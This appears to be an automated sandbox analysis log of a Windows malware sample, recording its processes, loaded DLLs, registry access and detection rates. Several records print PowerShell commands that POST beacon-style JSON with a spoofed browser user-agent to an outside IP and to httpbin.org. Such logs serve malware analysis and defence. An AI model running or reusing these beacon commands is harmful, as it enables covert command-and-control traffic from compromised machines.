Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A92900	0_2_00A92900
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A66540	0_2_00A66540
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A73280	0_2_00A73280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A786E0	0_2_00A786E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00AA8EE0	0_2_00AA8EE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00AAC260	0_2_00AAC260
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A99640	0_2_00A99640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00AADBA0	0_2_00AADBA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A81780	0_2_00A81780
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A657E0	0_2_00A657E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A8AFC0	0_2_00A8AFC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A6D720	0_2_00A6D720
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A6CB60	0_2_00A6CB60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A69B40	0_2_00A69B40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B874001	2_2_00007FFD9B874001
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B87ECFA	2_2_00007FFD9B87ECFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B880525	2_2_00007FFD9B880525
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B88049C	2_2_00007FFD9B88049C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9BAACFFD	6_2_00007FFD9BAACFFD

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: String function: 00A973C0 appears 327 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: String function: 00AACDE0 appears 37 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: String function: 00A95180 appears 327 times

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000000.1726678671.0000000000C79000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMSServic.exel% vs SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Binary or memory string: OriginalFilenameMSServic.exel% vs SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Source: classification engine

Classification label: mal64.evad.winEXE@14/20@2/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmlrqvwh.mlt.ps1

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

File opened: C:\Windows\system32\f997411056c7d2316993c4a55f85cd3554125ef9454f549df6f46b936586deb3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	ReversingLabs: Detection: 39%
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Virustotal: Detection: 58%

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

String found in binary or memory: net/addrselect.go

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
